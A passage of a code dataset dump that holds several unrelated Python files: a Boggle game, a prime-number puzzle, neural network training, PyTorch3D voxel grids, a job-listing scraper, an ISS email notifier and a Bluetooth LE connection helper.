print_board(board):\n\n '''\n Prints game board.\n '''\n\n for row in board:\n print(row)\n\ndef end_game(entered_words):\n\n '''\n Shows results of game.\n '''\n\n entered_words.sort()\n entered_words.sort(key=len, reverse=True)\n points = 0\n for word in entered_words:\n points += 200 * 2 **(len(word)-3)\n print(\"-----\")\n print(\"End game.\")\n print(\"Total points: {}\".format(points))\n print(\"Number of words: {}\".format(len(entered_words)))\n print(\"-----\")\n for word in entered_words:\n print(\"{}: {}\".format(word, 200*2**(len(word)-3)))\n\ndef play_game(board, words):\n\n '''\n Runs \"Boggle\".\n '''\n\n entered_words = []\n\n print_board(board)\n\n current = input(\"Enter a word you see, otherwise 0 to exit: \")\n while current != '0':\n current = current.upper()\n if current in entered_words:\n print(\"{} Already Entered!\".format(current))\n elif search_word(current, board, words) and current not in entered_words:\n print(\"{} Valid!\".format(current))\n entered_words.append(current)\n else:\n print(\"{} Invalid!\".format(current))\n print(\"-----\")\n print_board(board)\n current = input(\"Enter a word you see, otherwise 0 to exit: \")\n\n end_game(entered_words)\n\nif debug:\n seed = input(\"Enter random seed: \")\n random.seed(seed)\n\nplay_game(randomize_board(), load_words())\nif debug: print(\"Seed used: {}\".format(seed))\n","sub_path":"Boggle.py","file_name":"Boggle.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"34500853","text":"# takes minutes\n\n#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\ndef sievePrimes(upperLimit):\n\n marked = [0] * upperLimit # 0 = unmarked, 1 = notprime\n\n marked[0] = 1\n marked[1] = 1\n\n n = 2\n while (n * n) <= upperLimit:\n if marked[n] == 0:\n for i in range(n * n, upperLimit, n):\n marked[i] = 1\n\n n += 1\n\n primes = []\n for i in range(len(marked)):\n if marked[i] == 0:\n primes.append(i)\n\n return primes\n\n\nprimeList = sievePrimes(10000)\n\n\ncandidates = []\nlongestlist = 0\nfor a in range(-999,1000):\n for b in range(-1000,1001):\n li = []\n listlen = 0\n for n in range(0,1000):\n value = n**2 + a*n + b\n if value not in primeList:\n if listlen > 0:\n candidates.append([a, b, listlen, li])\n if listlen > longestlist:\n longestlist = listlen\n print(a, b, listlen, li, a*b)\n break\n else:\n li.append(value)\n listlen = len(li)\n","sub_path":"0027-quadratic-primes.py","file_name":"0027-quadratic-primes.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"3754801","text":"import tensorflow as tf\nimport numpy as np\nfrom utils import binToLabel\nfrom utils import mean_f1\n\ndef weightsIniti(shape):\n weightsMatrix = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(weightsMatrix)\n\ndef biasIniti(shape):\n biasMatrix = tf.constant(value=0.1, dtype=tf.float32, shape=shape)\n return tf.Variable(biasMatrix)\n\ndef train( xFile,\n yFile,\n colNumber,\n classNumber,\n learningRate,\n training_epochs,\n batch_size,\n display_step,\n labelThreshold,\n keepProb):\n #################################\n # Get the training data:\n #################################\n input = np.genfromtxt(xFile,delimiter=',',dtype=None)\n output = np.genfromtxt(yFile,delimiter=',',dtype=None)\n\n totalNumber = input.shape[0]\n\n\n #################################\n # Training Data placeholder\n #################################\n images = tf.placeholder(dtype=tf.float32, shape=[None, colNumber])\n labelsTrue = tf.placeholder(dtype=tf.float32, shape=[None, classNumber])\n\n\n #################################\n # Weights and Bias for different layers\n #################################\n weights = {\n 'h0': weightsIniti([colNumber, 2500]),\n 'h1': weightsIniti([2500, 1024]),\n 'h2': weightsIniti([1024, 365]),\n 'h3': weightsIniti([365, classNumber])\n }\n\n biases = {\n 'b0': biasIniti([2500]),\n 'b1': biasIniti([1024]),\n 'b2': biasIniti([365]),\n 'b3': biasIniti([classNumber])\n }\n\n keepProbability = tf.placeholder(\"float\")\n\n #################################\n # Construct the model\n #################################\n layer_0 = tf.matmul(images, weights['h0']) + biases['b0']\n out_0 = tf.nn.relu(layer_0)\n out_0 = tf.nn.dropout(out_0, keepProbability)\n\n layer_1 = tf.matmul(out_0, weights['h1']) + biases['b1']\n out_1 = tf.nn.relu(layer_1)\n out_1 = tf.nn.dropout(out_1, keepProbability)\n\n layer_2 = tf.matmul(out_1, weights['h2']) + biases['b2']\n out_2 = tf.nn.relu(layer_2)\n out_2 = tf.nn.dropout(out_2, keepProbability)\n\n layer_final = tf.matmul(out_2, weights['h3']) + biases['b3']\n out_final = tf.nn.sigmoid(layer_final)\n\n\n #################################\n # Define Cost Function:\n #################################\n costFunction = tf.reduce_sum(tf.square(out_final - labelsTrue))\n optimizer = tf.train.AdamOptimizer(learningRate).minimize(costFunction)\n\n # Initializing the variables\n init = tf.initialize_all_variables()\n\n sess = tf.Session()\n sess.run(init)\n\n for epoch in range(training_epochs):\n total_batch = int(totalNumber / batch_size)\n # Loop over all batches\n for i in range(total_batch-1):\n batch_x = input[i*batch_size:(i+1)*batch_size-1, :]\n batch_y = output[i*batch_size:(i+1)*batch_size-1, :]\n sess.run(optimizer, feed_dict={images: batch_x, labelsTrue: batch_y, keepProbability: keepProb})\n\n if epoch % display_step == 0:\n yPredicted = sess.run(out_final, feed_dict={images: input, labelsTrue: output, keepProbability: 1.0})\n yPredicted[yPredicted < labelThreshold] = 0\n yPredicted[yPredicted != 0] = 1\n\n yPredicted = binToLabel(yPredicted.astype(int))\n yTrue = binToLabel(output)\n meanF1 = mean_f1(yTrue, yPredicted)\n print('Epoch: {0}\\nThe Mean F1 Score is {1:.4f} '.format(epoch, meanF1))\n\n print(\"Optimization Finished!\")\n print('%'*80 + '\\n'*3)\n\n testIn = input[1900:1999,:]\n testOut = output[1900:1999,:]\n yPredicted = sess.run(out_final, feed_dict={images: testIn, labelsTrue: testOut, keepProbability: 1.0})\n yPredicted[yPredicted < labelThreshold] = 0\n yPredicted[yPredicted != 0] = 1\n\n yPredicted = binToLabel(yPredicted.astype(int))\n yTrue = binToLabel(testOut)\n meanF1 = mean_f1(yTrue, yPredicted)\n print('The Validation Mean F1 Score is {:.4f} '.format(meanF1))\n\n sess.close()\n return meanF1\n\n\n","sub_path":"classifier/mxnn.py","file_name":"mxnn.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"406275292","text":"\"\"\"\n665. Non-decreasing Array\nEasy: Array\n\nGiven an array nums with n integers, your task is to check if it could become non-decreasing by modifying at most 1 element.\n\nWe define an array is non-decreasing if nums[i] <= nums[i + 1] holds for every i (0-based) such that (0 <= i <= n - 2).\n\n \n\nExample 1:\n\nInput: nums = [4,2,3]\nOutput: true\nExplanation: You could modify the first 4 to 1 to get a non-decreasing array.\nExample 2:\n\nInput: nums = [4,2,1]\nOutput: false\nExplanation: You can't get a non-decreasing array by modify at most one element.\n\"\"\"\nclass Solution:\n def checkPossibility(self, nums: List[int]) -> bool:\n n = 0\n for i in range(len(nums) - 1):\n if nums[i] > nums[i + 1]:\n n += 1\n if i == 0:\n nums[i] = nums[i + 1]\n elif nums[i - 1] <= nums[i + 1]:\n nums[i] = nums[i - 1]\n else:\n nums[i + 1] = nums[i]\n if n > 1:\n return False\n # if n > 1 or ((i-1>=0 and nums[i-1]>nums[i+1]) and (i+2 torch.Tensor:\n \"\"\"\n Evaluates the voxel grid at points in the world coordinate frame.\n The interpolation type is determined by the `mode` member.\n\n Arguments:\n points (torch.Tensor): tensor of points that you want to query\n of a form (n_grids, n_points, 3)\n grid_values: an object of type Class.values_type which has tensors as\n members which have shapes derived from the get_shapes() method\n locator: a VolumeLocator object\n Returns:\n torch.Tensor: shape (n_grids, n_points, n_features)\n \"\"\"\n points_local = locator.world_to_local_coords(points)\n # pyre-ignore[29]\n return self.evaluate_local(points_local, grid_values)\n\n def evaluate_local(\n self, points: torch.Tensor, grid_values: VoxelGridValuesBase\n ) -> torch.Tensor:\n \"\"\"\n Evaluates the voxel grid at points in the local coordinate frame,\n The interpolation type is determined by the `mode` member.\n\n Arguments:\n points (torch.Tensor): tensor of points that you want to query\n of a form (n_points, 3), in a normalized form (coordinates are in [-1, 1])\n grid_values: an object of type VMFactorizedVoxelGrid.values_type which has tensors\n as members which have shapes derived from the get_shapes() method\n Returns:\n torch.Tensor: shape (n_grids, n_points, n_features)\n \"\"\"\n raise NotImplementedError()\n\n def get_shapes(self) -> Dict[str, Tuple]:\n \"\"\"\n Using parameters from the __init__ method, this method returns the\n shapes of individual tensors needed to run the evaluate method.\n\n Returns:\n a dictionary of needed shapes. To use the evaluate_local and evaluate_world methods\n replace the shapes in the dictionary with tensors of those shapes and add the\n first 'batch' dimension. If the required shape is (a, b) and you want to\n have g grids than the tensor that replaces the shape should have the\n shape (g, a, b).\n \"\"\"\n raise NotImplementedError()\n\n\n@dataclass\nclass FullResolutionVoxelGridValues(VoxelGridValuesBase):\n voxel_grid: torch.Tensor\n\n\n@registry.register\nclass FullResolutionVoxelGrid(VoxelGridBase):\n \"\"\"\n Full resolution voxel grid equivalent to 4D tensor where shape is\n (features, width, height, depth) with linear interpolation between voxels.\n \"\"\"\n\n # the type of grid_values argument needed to run evaluate_local()\n values_type: ClassVar[Type[VoxelGridValuesBase]] = FullResolutionVoxelGridValues\n\n def evaluate_local(\n self, points: torch.Tensor, grid_values: FullResolutionVoxelGridValues\n ) -> torch.Tensor:\n \"\"\"\n Evaluates the voxel grid at points in the local coordinate frame,\n The interpolation type is determined by the `mode` member.\n\n Arguments:\n points (torch.Tensor): tensor of points that you want to query\n of a form (n_points, 3), in a normalized form (coordinates are in [-1, 1])\n grid_values: an object of type values_type which has tensors as\n members which have shapes derived from the get_shapes() method\n Returns:\n torch.Tensor: shape (n_grids, n_points, n_features)\n \"\"\"\n return interpolate_volume(\n points,\n grid_values.voxel_grid,\n align_corners=self.align_corners,\n padding_mode=self.padding,\n mode=self.mode,\n )\n\n def get_shapes(self) -> Dict[str, Tuple]:\n return {\"voxel_grid\": (self.n_features, *self.resolution)}\n\n\n@dataclass\nclass CPFactorizedVoxelGridValues(VoxelGridValuesBase):\n vector_components_x: torch.Tensor\n vector_components_y: torch.Tensor\n vector_components_z: torch.Tensor\n basis_matrix: Optional[torch.Tensor] = None\n\n\n@registry.register\nclass CPFactorizedVoxelGrid(VoxelGridBase):\n \"\"\"\n Canonical Polyadic (CP/CANDECOMP/PARAFAC) Factorization factorizes the 3d grid into three\n vectors (x, y, z). For n_components=n, the 3d grid is a sum of the two outer products\n (call it ⊗) of each vector type (x, y, z):\n\n 3d_grid = x0 ⊗ y0 ⊗ z0 + x1 ⊗ y1 ⊗ z1 + ... + xn ⊗ yn ⊗ zn\n\n These tensors are passed in a object of CPFactorizedVoxelGridValues (here obj) as\n obj.vector_components_x, obj.vector_components_y, obj.vector_components_z. Their shapes are\n `(n_components, r)` where `r` is the relevant resolution.\n\n Each element of this sum has an extra dimension, which gets matrix-multiplied by an\n appropriate \"basis matrix\" of shape (n_grids, n_components, n_features). This multiplication\n brings us to the desired \"n_features\" dimensionality. If matrix_reduction=False the elements\n of different components are summed together to create (n_grids, n_components, 1) tensor.\n With some notation abuse, ignoring the interpolation operation, simplifying and denoting\n n_features as F, n_components as C and n_grids as G:\n\n 3d_grid = (x ⊗ y ⊗ z) @ basis # GWHDC x GCF -> GWHDF\n\n The basis feature vectors are passed as obj.basis_matrix.\n\n Members:\n n_components: number of vector triplets, higher number gives better approximation.\n matrix_reduction: how to transform components. If matrix_reduction=True result\n matrix of shape (n_grids, n_points, n_components) is batch matrix multiplied by the\n basis_matrix of shape (n_grids, n_components, n_features). If\n matrix_reduction=False, the result tensor of (n_grids, n_points, n_components)\n is summed along the rows to get (n_grids, n_points, 1).\n \"\"\"\n\n # the type of grid_values argument needed to run evaluate_local()\n values_type: ClassVar[Type[VoxelGridValuesBase]] = CPFactorizedVoxelGridValues\n\n n_components: int = 24\n matrix_reduction: bool = True\n\n def evaluate_local(\n self, points: torch.Tensor, grid_values: CPFactorizedVoxelGridValues\n ) -> torch.Tensor:\n def factor(i):\n axis = [\"x\", \"y\", \"z\"][i]\n index = points[..., i, None]\n vector = getattr(grid_values, \"vector_components_\" + axis)\n return interpolate_line(\n index,\n vector,\n align_corners=self.align_corners,\n padding_mode=self.padding,\n mode=self.mode,\n )\n\n # collect points from all the vectors and multipy them out\n mult = factor(0) * factor(1) * factor(2)\n\n # reduce the result from\n # (n_grids, n_points, n_components) to (n_grids, n_points, n_features)\n if grid_values.basis_matrix is not None:\n # (n_grids, n_points, n_features) =\n # (n_grids, n_points, total_n_components) x (total_n_components, n_features)\n return torch.bmm(mult, grid_values.basis_matrix)\n\n return mult.sum(axis=-1, keepdim=True)\n\n def get_shapes(self) -> Dict[str, Tuple[int, int]]:\n if self.matrix_reduction is False and self.n_features != 1:\n raise ValueError(\"Cannot set matrix_reduction=False and n_features to != 1\")\n\n shape_dict = {\n \"vector_components_x\": (self.n_components, self.resolution[0]),\n \"vector_components_y\": (self.n_components, self.resolution[1]),\n \"vector_components_z\": (self.n_components, self.resolution[2]),\n }\n if self.matrix_reduction:\n shape_dict[\"basis_matrix\"] = (self.n_components, self.n_features)\n return shape_dict\n\n\n@dataclass\nclass VMFactorizedVoxelGridValues(VoxelGridValuesBase):\n vector_components_x: torch.Tensor\n vector_components_y: torch.Tensor\n vector_components_z: torch.Tensor\n matrix_components_xy: torch.Tensor\n matrix_components_yz: torch.Tensor\n matrix_components_xz: torch.Tensor\n basis_matrix: Optional[torch.Tensor] = None\n\n\n@registry.register\nclass VMFactorizedVoxelGrid(VoxelGridBase):\n \"\"\"\n Implementation of Vector-Matrix Factorization of a tensor from\n https://arxiv.org/abs/2203.09517.\n\n Vector-Matrix Factorization factorizes the 3d grid into three matrices\n (xy, xz, yz) and three vectors (x, y, z). For n_components=1, the 3d grid\n is a sum of the outer products (call it ⊗) of each matrix with its\n complementary vector:\n\n 3d_grid = xy ⊗ z + xz ⊗ y + yz ⊗ x.\n\n These tensors are passed in a VMFactorizedVoxelGridValues object (here obj)\n as obj.matrix_components_xy, obj.matrix_components_xy, obj.vector_components_y, etc.\n\n Their shapes are `(n_grids, n_components, r0, r1)` for matrix_components and\n (n_grids, n_components, r2)` for vector_componenets. Each of `r0, r1 and r2` coresponds\n to one resolution in (width, height and depth).\n\n Each element of this sum has an extra dimension, which gets matrix-multiplied by an\n appropriate \"basis matrix\" of shape (n_grids, n_components, n_features). This multiplication\n brings us to the desired \"n_features\" dimensionality. If matrix_reduction=False the elements\n of different components are summed together to create (n_grids, n_components, 1) tensor.\n With some notation abuse, ignoring the interpolation operation, simplifying and denoting\n n_features as F, n_components as C (which can differ for each dimension) and n_grids as G:\n\n 3d_grid = concat((xy ⊗ z), (xz ⊗ y).permute(0, 2, 1),\n (yz ⊗ x).permute(2, 0, 1)) @ basis_matrix # GWHDC x GCF -> GWHDF\n\n Members:\n n_components: total number of matrix vector pairs, this must be divisible by 3. Set\n this if you want to have equal representational power in all 3 directions. You\n must specify either n_components or distribution_of_components, you cannot\n specify both.\n distribution_of_components: if you do not want equal representational power in\n all 3 directions specify a tuple of numbers of matrix_vector pairs for each\n coordinate of a form (n_xy_planes, n_yz_planes, n_xz_planes). You must specify\n either n_components or distribution_of_components, you cannot specify both.\n matrix_reduction: how to transform components. If matrix_reduction=True result\n matrix of shape (n_grids, n_points, n_components) is batch matrix multiplied by\n the basis_matrix of shape (n_grids, n_components, n_features). If\n matrix_reduction=False, the result tensor of (n_grids, n_points, n_components)\n is summed along the rows to get (n_grids, n_points, 1).\n \"\"\"\n\n # the type of grid_values argument needed to run evaluate_local()\n values_type: ClassVar[Type[VoxelGridValuesBase]] = VMFactorizedVoxelGridValues\n\n n_components: Optional[int] = None\n distribution_of_components: Optional[Tuple[int, int, int]] = None\n matrix_reduction: bool = True\n\n def evaluate_local(\n self, points: torch.Tensor, grid_values: VMFactorizedVoxelGridValues\n ) -> torch.Tensor:\n # collect points from matrices and vectors and multiply them\n a = interpolate_plane(\n points[..., :2],\n grid_values.matrix_components_xy,\n align_corners=self.align_corners,\n padding_mode=self.padding,\n mode=self.mode,\n ) * interpolate_line(\n points[..., 2:],\n grid_values.vector_components_z,\n align_corners=self.align_corners,\n padding_mode=self.padding,\n mode=self.mode,\n )\n b = interpolate_plane(\n points[..., [0, 2]],\n grid_values.matrix_components_xz,\n align_corners=self.align_corners,\n padding_mode=self.padding,\n mode=self.mode,\n ) * interpolate_line(\n points[..., 1:2],\n grid_values.vector_components_y,\n align_corners=self.align_corners,\n padding_mode=self.padding,\n mode=self.mode,\n )\n c = interpolate_plane(\n points[..., 1:],\n grid_values.matrix_components_yz,\n align_corners=self.align_corners,\n padding_mode=self.padding,\n mode=self.mode,\n ) * interpolate_line(\n points[..., :1],\n grid_values.vector_components_x,\n align_corners=self.align_corners,\n padding_mode=self.padding,\n mode=self.mode,\n )\n # pyre-ignore[28]\n feats = torch.cat((a, b, c), axis=-1)\n\n # reduce the result from\n # (n_grids, n_points, n_components) to (n_grids, n_points, n_features)\n if grid_values.basis_matrix is not None:\n # (n_grids, n_points, n_features) =\n # (n_grids, n_points, total_n_components) x\n # (n_grids, total_n_components, n_features)\n return torch.bmm(feats, grid_values.basis_matrix)\n # pyre-ignore[28]\n return feats.sum(axis=-1, keepdim=True)\n\n def get_shapes(self) -> Dict[str, Tuple]:\n if self.matrix_reduction is False and self.n_features != 1:\n raise ValueError(\"Cannot set matrix_reduction=False and n_features to != 1\")\n if self.distribution_of_components is None and self.n_components is None:\n raise ValueError(\n \"You need to provide n_components or distribution_of_components\"\n )\n if (\n self.distribution_of_components is not None\n and self.n_components is not None\n ):\n raise ValueError(\n \"You cannot define n_components and distribution_of_components\"\n )\n # pyre-ignore[58]\n if self.distribution_of_components is None and self.n_components % 3 != 0:\n raise ValueError(\"n_components must be divisible by 3\")\n if self.distribution_of_components is None:\n # pyre-ignore[58]\n calculated_distribution_of_components = [\n self.n_components // 3 for _ in range(3)\n ]\n else:\n calculated_distribution_of_components = self.distribution_of_components\n\n shape_dict = {\n \"vector_components_x\": (\n calculated_distribution_of_components[1],\n self.resolution[0],\n ),\n \"vector_components_y\": (\n calculated_distribution_of_components[2],\n self.resolution[1],\n ),\n \"vector_components_z\": (\n calculated_distribution_of_components[0],\n self.resolution[2],\n ),\n \"matrix_components_xy\": (\n calculated_distribution_of_components[0],\n self.resolution[0],\n self.resolution[1],\n ),\n \"matrix_components_yz\": (\n calculated_distribution_of_components[1],\n self.resolution[1],\n self.resolution[2],\n ),\n \"matrix_components_xz\": (\n calculated_distribution_of_components[2],\n self.resolution[0],\n self.resolution[2],\n ),\n }\n if self.matrix_reduction:\n shape_dict[\"basis_matrix\"] = (\n sum(calculated_distribution_of_components),\n self.n_features,\n )\n\n return shape_dict\n\n\nclass VoxelGridModule(Configurable, torch.nn.Module):\n \"\"\"\n A wrapper torch.nn.Module for the VoxelGrid classes, which\n contains parameters that are needed to train the VoxelGrid classes.\n\n Members:\n voxel_grid_class_type: The name of the class to use for voxel_grid,\n which must be available in the registry. Default FullResolutionVoxelGrid.\n voxel_grid: An instance of `VoxelGridBase`. This is the object which\n this class wraps.\n extents: 3-tuple of a form (width, height, depth), denotes the size of the grid\n in world units.\n translation: 3-tuple of float. The center of the volume in world units as (x, y, z).\n init_std: Parameters are initialized using the gaussian distribution\n with mean=init_mean and std=init_std. Default 0.1\n init_mean: Parameters are initialized using the gaussian distribution\n with mean=init_mean and std=init_std. Default 0.\n \"\"\"\n\n voxel_grid_class_type: str = \"FullResolutionVoxelGrid\"\n voxel_grid: VoxelGridBase\n\n extents: Tuple[float, float, float] = 1.0\n translation: Tuple[float, float, float] = (0.0, 0.0, 0.0)\n\n init_std: float = 0.1\n init_mean: float = 0\n\n def __post_init__(self):\n super().__init__()\n run_auto_creation(self)\n n_grids = 1 # Voxel grid objects are batched. We need only a single grid.\n shapes = self.voxel_grid.get_shapes()\n params = {\n name: torch.normal(\n mean=torch.zeros((n_grids, *shape)) + self.init_mean,\n std=self.init_std,\n )\n for name, shape in shapes.items()\n }\n self.params = torch.nn.ParameterDict(params)\n\n def forward(self, points: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Evaluates points in the world coordinate frame on the voxel_grid.\n\n Args:\n points (torch.Tensor): tensor of points that you want to query\n of a form (n_points, 3)\n Returns:\n torch.Tensor of shape (n_points, n_features)\n \"\"\"\n locator = VolumeLocator(\n batch_size=1,\n # The resolution of the voxel grid does not need to be known\n # to the locator object. It is easiest to fix the resolution of the locator.\n # In particular we fix it to (2,2,2) so that there is exactly one voxel of the\n # desired size. The locator object uses (z, y, x) convention for the grid_size,\n # and this module uses (x, y, z) convention so the order has to be reversed\n # (irrelevant in this case since they are all equal).\n # It is (2, 2, 2) because the VolumeLocator object behaves like\n # align_corners=True, which means that the points are in the corners of\n # the volume. So in the grid of (2, 2, 2) there is only one voxel.\n grid_sizes=(2, 2, 2),\n # The locator object uses (x, y, z) convention for the\n # voxel size and translation.\n voxel_size=self.extents,\n volume_translation=self.translation,\n device=next(self.params.values()).device,\n )\n grid_values = self.voxel_grid.values_type(**self.params)\n # voxel grids operate with extra n_grids dimension, which we fix to one\n return self.voxel_grid.evaluate_world(points[None], grid_values, locator)[0]\n","sub_path":"pytorch3d/implicitron/models/implicit_function/voxel_grid.py","file_name":"voxel_grid.py","file_ext":"py","file_size_in_byte":21608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"569746877","text":"import sys\n\ndef drop_interval(subFile, iter, start, end):\n inputFile = \"Interval.\" + str(iter) + \".txt\"\n subFile += \"Arguments = \" + inputFile + \"\\n\"\n subFile += \"Queue\\n\"\n f = open(inputFile, \"w\")\n f.write(str(start))\n f.write(\" \")\n f.write(str(end))\n f.close()\n \n return subFile\n \n\nif __name__==\"__main__\":\n \n subFile = \"\"\"\n Universe = vanilla\n Executable = d:\\\\univ\\\\code\\\\y4se1\\\\pdc\\\\lab3\\\\ex2\\\\prime\\\\Debug\\\\prime.exe\n Log = prime.$(Process).log.txt\n Output = prime.$(Process).out.txt\n Error = prime.$(Process).err.txt\n transfer_input_files = Interval.$(Process).txt\n should_transfer_files = YES\n when_to_transfer_output = ON_EXIT\n \"\"\"\n\n print(subFile)\n \n if(len(sys.argv) < 4):\n print(\"Usage: {0} lStart lEnd nrChunks\".format(sys.argv[0]))\n exit(1)\n \n lStart = int(sys.argv[1])\n lEnd = int(sys.argv[2])\n nrChunks = int(sys.argv[3])\n intervalSize = (lEnd - lStart) / nrChunks\n \n start = lStart\n for i in range(0, nrChunks):\n end = start + intervalSize\n subFile = drop_interval(subFile, i, start, end)\n start = end\n \n f = open(\"prime.sub\", \"w\")\n f.write(subFile)\n f.close()","sub_path":"y4se1/pdc/lab3/ex2/c/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"91086556","text":"# _*_ coding: utf-8 _*_\n\"\"\"This file is a GetHired spider created on top of the ATSSpider\nscrapy crawl gethired -a url=\"https://carekinesis.gethired.com/\" -a mining_job_id=999 -a iteration=1 -a extract=1\nsample url:\n https://carekinesis.gethired.com/\n https://cdrnys.gethired.com/\n\"\"\"\nfrom re import compile\n\nfrom scrapy.selector import Selector\nfrom scrapy.http import Request\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, RemoveEmptyTags\n\n\nclass GetHired(ATSSpider):\n\n name = \"gethired\"\n ref_re = compile(\"job/(.*)\")\n\n def parse(self, response):\n sel = Selector(response)\n jobs = sel.xpath(\"//ul[@id='jobs']/li\")\n for job in jobs:\n job_link = job.xpath(\"./a/@href\").extract()\n if job_link:\n meta = {\n 'title': job.xpath(\n \"./a[not(contains(@class,'toggle'))]/text()\"\n ).extract(),\n }\n yield Request(\n job_link[0], meta=meta, callback=self.parse_job_callback()\n )\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n loader.add_value('url', response.url)\n loader.add_value('title', response.meta['title'])\n loader.add_xpath(\n 'company',\n \"/h2/following-sibling::table/tbody/tr[2]/td/strong/a/text()\"\n )\n loader.add_xpath(\n 'description',\n \"//h2/following-sibling::node()[not(self::table)]\",\n RemoveEmptyTags()\n )\n loader.add_xpath(\n 'location',\n \"//a[contains(@href,'location')]/text()\"\n )\n loader.add_value(\n 'referencenumber', response.url, Prefix(\"%s-\" % self.name),\n re=self.ref_re\n )\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/gethired.py","file_name":"gethired.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"546640349","text":"import requests\nfrom datetime import datetime\nimport smtplib\nimport time\n\nMY_EMAIL = 'nawodya135@gmail.com'\nMY_PASSWORD = 'EMAIL_PASSWORD'\n\nMY_LAT = 7.5554942\nMY_LONG = 80.7137847\n\n\ndef is_iss_overhead():\n r = requests.get('http://api.open-notify.org/iss-now.json')\n r.raise_for_status()\n data = r.json()\n\n iss_latitude = float(data['iss_position']['latitude'])\n iss_longitude = float(data['iss_position']['longitude'])\n\n if MY_LAT -5 <= iss_latitude <= MY_LAT + 5 and MY_LONG - 5 <= iss_longitude <= MY_LONG + 5:\n return True\n\ndef is_night():\n\n parameters = {\n 'lat' : MY_LAT,\n 'lng': MY_LONG,\n 'formatted':0,\n }\n response = requests.get('https://api.sunrise-sunset.org/json', params=parameters)\n response.raise_for_status()\n\n data = response.json()\n sunrise = int(data['results']['sunrise'].split(\"T\")[1].split(\":\")[0])\n sunset = int(data['results']['sunset'].split('T')[1].split(':')[0])\n \n time_now = datetime.now().hour\n \n if time_now >= sunset or time_now <= sunrise:\n return True\n\nwhile True:\n time.sleep(60)\n if is_iss_overhead() and is_night():\n connection = smtplib.SMTP('smtp.gmail.com')\n connection.starttls()\n connection.login(MY_EMAIL, MY_PASSWORD)\n connection.sendmail(\n from_addr='nawody135@gmail.com',\n to_addrs=MY_EMAIL,\n msg=\"Subject: Look Up 👆 \\n\\n The ISS is above you in the sky..\"\n )\n else:\n print(\"ISS is not above you in the sky..\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"128153612","text":"import asyncio\nimport logging\nimport platform\n\nfrom bleak import BleakScanner, BleakClient\nfrom bleak.backends.device import BLEDevice\n\n\nasync def find_device(name: str, timeout: float = 5) -> BLEDevice:\n \"\"\"Quickly find BLE device address by friendly device name.\n\n This is an alternative to bleak.discover. Instead of waiting a long time to\n scan everything, it returns as soon as it finds any device with the\n requested name.\n\n Arguments:\n name (str):\n Friendly device name.\n timeout (float):\n When to give up searching.\n\n Returns:\n BLEDevice: Matching device.\n\n Raises:\n asyncio.TimeoutError:\n Device was not found within the timeout.\n \"\"\"\n print(\"Searching for {0}\".format(name))\n\n # Flag raised by detection of a device\n device_discovered = False\n\n def set_device_discovered(*args):\n nonlocal device_discovered\n device_discovered = True\n\n # Create scanner object and register callback to raise discovery flag\n scanner = BleakScanner()\n scanner.register_detection_callback(set_device_discovered)\n\n # Start the scanner\n await scanner.start()\n\n INTERVAL = 0.1\n\n # Sleep until a device of interest is discovered. We cheat by using the\n # cross-platform get_discovered_devices() ahead of time, instead of waiting\n # for the whole discover() process to complete. We call it every time\n # a new device is detected by the register_detection_callback.\n for i in range(round(timeout/INTERVAL)):\n # If device_discovered flag is raised, check if it's the right one.\n if device_discovered:\n # Unset the flag so we only check if raised again.\n device_discovered = False\n # Check if any of the devices found so far has the expected name.\n devices = await scanner.get_discovered_devices()\n for dev in devices:\n # HACK: work around bleak bug in Windows\n if platform.system() == 'Windows':\n response = scanner._scan_responses.get(dev.details.BluetoothAddress)\n if response:\n dev.name = response.Advertisement.LocalName\n # If the name matches, stop scanning and return.\n if name == dev.name:\n await scanner.stop()\n return dev\n # Await until we check again.\n await asyncio.sleep(INTERVAL)\n\n # If we are here, scanning has timed out.\n await scanner.stop()\n raise asyncio.TimeoutError(\n \"Could not find {0} in {1} seconds\".format(name, timeout)\n )\n\n\nclass BLEConnection():\n \"\"\"Configure BLE, connect, send data, and handle receive events.\"\"\"\n\n def __init__(self, char_rx_UUID, char_tx_UUID, mtu, **kwargs):\n \"\"\"Initializes and configures connection settings.\n\n Arguments:\n char_rx_UUID (str):\n UUID for RX.\n char_rx_UUID (str):\n UUID for TX.\n mtu (int):\n Maximum number of bytes per write operation.\n\n \"\"\"\n # Save given settings\n self.char_rx_UUID = char_rx_UUID\n self.char_tx_UUID = char_tx_UUID\n self.mtu = mtu\n self.connected = False\n\n # Get a logger and set at given level\n self.logger = logging.getLogger('BLERequestsConnection')\n handler = logging.StreamHandler()\n formatter = logging.Formatter(\n '%(asctime)s: %(levelname)7s: %(message)s'\n )\n handler.setFormatter(formatter)\n self.logger.addHandler(handler)\n self.logger.setLevel(logging.WARNING)\n\n super().__init__(**kwargs)\n\n def data_handler(self, sender, data):\n \"\"\"Handles new incoming data.\n\n This is usually overridden by a mixin class.\n\n Arguments:\n sender (str):\n Sender uuid.\n data (bytes):\n Bytes to process.\n \"\"\"\n self.logger.debug(\"DATA {0}\".format(data))\n\n def disconnected_handler(self, client: BleakClient):\n \"\"\"Handles disconnected event.\"\"\"\n self.logger.debug(\"Disconnected.\")\n self.connected = False\n\n async def connect(self, device: BLEDevice):\n \"\"\"Connects to a BLE device.\n\n Arguments:\n device (BLEDevice):\n Client device\n \"\"\"\n\n print(\"Connecting to\", device)\n self.client = 